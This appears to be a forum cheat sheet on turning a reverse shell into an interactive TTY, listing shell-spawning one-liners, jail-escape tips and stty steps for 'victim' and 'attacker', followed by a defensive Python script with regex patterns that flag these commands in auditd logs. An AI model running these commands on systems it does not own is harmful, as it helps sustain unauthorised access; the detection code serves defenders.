Obtaining a Fully TTY Interactive Shell

Shell Spawning

  • python -c 'import pty; pty.spawn("/bin/sh")'

  • echo os.system('/bin/bash')

  • /bin/sh -i

  • perl -e 'exec "/bin/sh";'

  • perl: exec "/bin/sh";

  • ruby: exec "/bin/sh"

  • lua: os.execute('/bin/sh')

  • (From within IRB)

exec "/bin/sh"

  • (From within vi)


  • (From within vi)

:set shell=/bin/bash:shell

  • (From within nmap)


Many of these will also allow you to escape jail shells. The top 3 would be my most successful in general for spawning from the command line.

After that, do CTRL+Z to background Netcat. Enter stty raw -echo in your terminal, which will tell your terminal to pass keyboard shortcuts etc. through. Once that is done, run the command fg to bring Netcat back to the foreground.

I wanted to contribute to this post.

TTY Shell

On victim
python -c 'import pty;pty.spawn("/bin/bash")'

On attacker
echo $TERM # note down
stty -a # note down rows and cols
stty raw -echo # this may be enough

On victim
export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 225
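Seen from the defender's side, the command-line one-liners in this thread show up in process-execution telemetry. The following is an added example, not part of either post: it decodes Linux auditd EXECVE records (auditd hex-encodes arguments that contain spaces or quotes) and flags the spawn commands listed above. The pattern names, helper names and sample records are assumptions constructed for illustration.

```python
import re

# Command-line patterns for one-liners listed in this thread (names are illustrative).
SPAWN_PATTERNS = [
    ("python-pty", re.compile(r"\bpython[\d.]*\s+-c\s+.*pty\.spawn\(")),
    ("perl-exec-sh", re.compile(r"\bperl\s+-e\s+.*exec\s+[\"']/bin/(ba)?sh")),
    ("interactive-sh", re.compile(r"^(/bin/)?(ba)?sh\s+-i$")),
]

# a0="quoted" for plain arguments, a2=HEX for ones auditd considers untrusted.
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')


def decode_execve(record):
    """Rebuild the command line from one auditd EXECVE record."""
    args = {}
    for m in ARG_RE.finditer(record):
        idx, quoted, hexed = int(m.group(1)), m.group(2), m.group(3)
        if quoted is not None:
            args[idx] = quoted
        else:
            try:
                args[idx] = bytes.fromhex(hexed).decode("utf-8", "replace")
            except ValueError:  # odd-length or truncated hex: keep the raw text
                args[idx] = hexed
    return " ".join(args[i] for i in sorted(args))


def classify(record):
    """Return the names of every pattern the decoded command line matches."""
    cmd = decode_execve(record)
    return [name for name, pat in SPAWN_PATTERNS if pat.search(cmd)]


def make_record(argv):
    """Build a constructed sample record, encoding argv the way auditd does."""
    def enc(a):
        return a.encode().hex().upper() if re.search(r'[\s"]', a) else f'"{a}"'
    fields = " ".join(f"a{i}={enc(a)}" for i, a in enumerate(argv))
    return f"type=EXECVE msg=audit(1700000000.000:1): argc={len(argv)} {fields}"


SAMPLES = [make_record(a) for a in (  # constructed, not captured from a real host
    ["python", "-c", 'import pty;pty.spawn("/bin/bash")'],
    ["perl", "-e", 'exec "/bin/sh";'],
    ["/bin/sh", "-i"],
    ["python", "manage.py", "runserver"],  # benign control
)]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(classify(rec) or ["-"], decode_execve(rec))
```

The variants typed inside an already running interpreter (IRB, vi, lua) carry no telltale arguments, so they appear in EXECVE records only as the resulting shell and need parent-process context to stand out.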